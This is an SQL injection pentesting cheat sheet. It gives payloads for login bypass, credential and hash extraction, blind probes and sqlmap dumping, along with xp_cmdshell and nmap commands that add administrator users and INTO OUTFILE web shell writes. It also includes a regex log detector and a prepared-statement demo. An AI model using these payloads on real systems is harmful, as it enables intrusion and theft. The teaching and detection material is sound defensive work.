SQLDB Pentest

SQL Database & SQL Injection Pentesting Cheat Sheet

SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques.

Step 1: Identifying SQL Database Type

Check the database type by sending payloads in the input fields or URL:

' OR 1=1 --     (MySQL, PostgreSQL, MSSQL)
' UNION SELECT 1,2,3 -- (Check column count)
' AND 1=CONVERT(int,@@version) -- (MSSQL Test)

Observe the error messages for database identification.

Step 2: Enumerating Database Tables & Columns

Use SQL queries to extract database structure.

For MySQL:

SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE();
SELECT column_name FROM information_schema.columns WHERE table_name='users';

For MSSQL:

SELECT name FROM sysobjects WHERE xtype='U';  -- List Tables
SELECT name FROM syscolumns WHERE id=OBJECT_ID('users');  -- List Columns

Step 3: Extracting Data (SQL Injection Exploitation)

Inject SQL payloads into vulnerable parameters to retrieve data.

' UNION SELECT username,password FROM users --

Using subqueries to avoid detection:

' UNION SELECT (SELECT group_concat(username, ':', password) FROM users) --

Step 4: Bypassing Authentication via SQL Injection

Common authentication bypass payloads:

' OR '1'='1' -- 
' OR '1'='1'#
admin' --

If the login form is vulnerable, attackers can gain access to admin accounts.

Step 5: Privilege Escalation via SQL Injection

If you can execute SQL commands, escalate privileges:

For MySQL:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'newpassword';  -- MySQL 5.7 and earlier; MySQL 8.0 removed IDENTIFIED BY from GRANT

For MSSQL (if xp_cmdshell is enabled):

EXEC xp_cmdshell 'whoami';  -- Execute system commands

Step 6: Extracting Hashes from the Database

Retrieve password hashes for cracking:

For MySQL:

SELECT user, host, password FROM mysql.user;  -- MySQL 5.6 and earlier; 5.7+ renamed the column to authentication_string

For MSSQL:

SELECT name, password_hash FROM sys.sql_logins;

Step 7: Blind SQL Injection

When errors are not displayed, use time-based blind SQL injection:

' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
' OR WAITFOR DELAY '0:0:5' -- (MSSQL)
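From the defender's side, the payload families in Steps 1 to 7 leave recognisable traces in web-server access logs. The following detector is an added example, not code from the original post; it URL-decodes each request target and tags the signature families it matches. The log lines are constructed samples in combined-log format, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Signature families drawn from the payloads on this page (UNION-based,
# time-based blind, schema enumeration, MSSQL command execution, file write).
SQLI_SIGNATURES = {
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "time_based_mysql": re.compile(r"\bsleep\s*\(", re.I),
    "time_based_mssql": re.compile(r"waitfor\s+delay", re.I),
    "schema_enum": re.compile(r"information_schema|sysobjects|syscolumns", re.I),
    "cmd_exec": re.compile(r"xp_cmdshell", re.I),
    "file_write": re.compile(r"into\s+(out|dump)file", re.I),
    "tautology": re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I),
}

# Combined-log format: only the request target is needed for matching.
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

def classify_request(target):
    """Return the signature names that match a request target, after decoding."""
    decoded = unquote_plus(unquote_plus(target))  # second pass catches double encoding
    return [name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (line_number, target, hits) for every log line with at least one hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line we can parse
        hits = classify_request(m.group(1))
        if hits:
            findings.append((n, m.group(1), hits))
    return findings

# Constructed sample log lines (not real traffic): one benign request and three
# requests carrying payloads from this cheat sheet.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users%20-- HTTP/1.1" 200 2048',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1%27%20OR%20IF(1%3D1,SLEEP(5),0)%20-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?id=1%27%20OR%20WAITFOR%20DELAY%20%270:0:5%27%20-- HTTP/1.1" 500 128',
]

if __name__ == "__main__":
    for n, target, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {hits} <- {target}")
```

Pair the signature hits with response-time outliers on the same URL to confirm time-based probes, since a benign request will not consistently take five seconds longer.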

Step 8: Using SQLMap for Automated SQL Injection

SQLMap automates SQL injection testing:

sqlmap -u "http://example.com/page.php?id=1" --dbs
sqlmap -u "http://example.com/page.php?id=1" --dump-all

Step 9: Extracting Files via SQL Injection

Read or write files on the database server using SQL queries.

For MySQL (OUTFILE method):

SELECT "" INTO OUTFILE '/var/www/html/shell.php';

For MSSQL (Bulk Insert):

BULK INSERT mytable FROM 'C:\inetpub\wwwroot\web.config';

Step 10: Web Shell Upload via SQL Injection

If file writing is enabled, upload a web shell:

SELECT "" INTO OUTFILE '/var/www/html/backdoor.php';

SQL Enumeration with nmap

Enumerate MSSQL and MySQL services with nmap NSE scripts:

nmap -p 1433 --script ms-sql-info --script-args mssql.instance-port=1433 IP_ADDRESS
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user abc abc /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators user /add"
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.1

Mitigation Recommendations

  • Use prepared statements to prevent SQL injection.
  • Restrict database permissions to avoid privilege escalation.
  • Use Web Application Firewalls (WAF) to block malicious queries.
  • Sanitize user input and avoid dynamic SQL queries.
  • Regularly update and patch database management systems.
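To make the first recommendation concrete, here is an added example (not code from the original post) that runs the Step 4 bypass payloads against a string-concatenated login query and against the same query as a prepared statement. It uses an in-memory SQLite database seeded with constructed users; the plaintext password comparison is a simplification for the demo, real code would compare a salted hash.

```python
import sqlite3

# Constructed sample users for the demo (not from any real system).
SAMPLE_USERS = [("admin", "S3cretAdmin!"), ("alice", "alicepw")]

def make_db():
    """In-memory SQLite database seeded with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn

def login_vulnerable(conn, username, password):
    """Query built by string concatenation: attacker input becomes part of the SQL."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Prepared statement: the driver binds values, so quotes and '--' stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# Authentication-bypass payloads from Step 4 of the cheat sheet above.
BYPASS_PAYLOADS = ["' OR '1'='1' --", "admin' --"]

def demo():
    """Map each payload to (vulnerable result, prepared-statement result)."""
    conn = make_db()
    return {
        payload: (login_vulnerable(conn, payload, "wrong"), login_safe(conn, payload, "wrong"))
        for payload in BYPASS_PAYLOADS
    }

if __name__ == "__main__":
    for payload, (vuln, safe) in demo().items():
        print(f"{payload!r}: concatenated -> {vuln}, prepared -> {safe}")
```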

Conclusion

SQL injection remains one of the most critical security vulnerabilities. Proper security testing, patching, and mitigation techniques can help protect databases from exploitation.
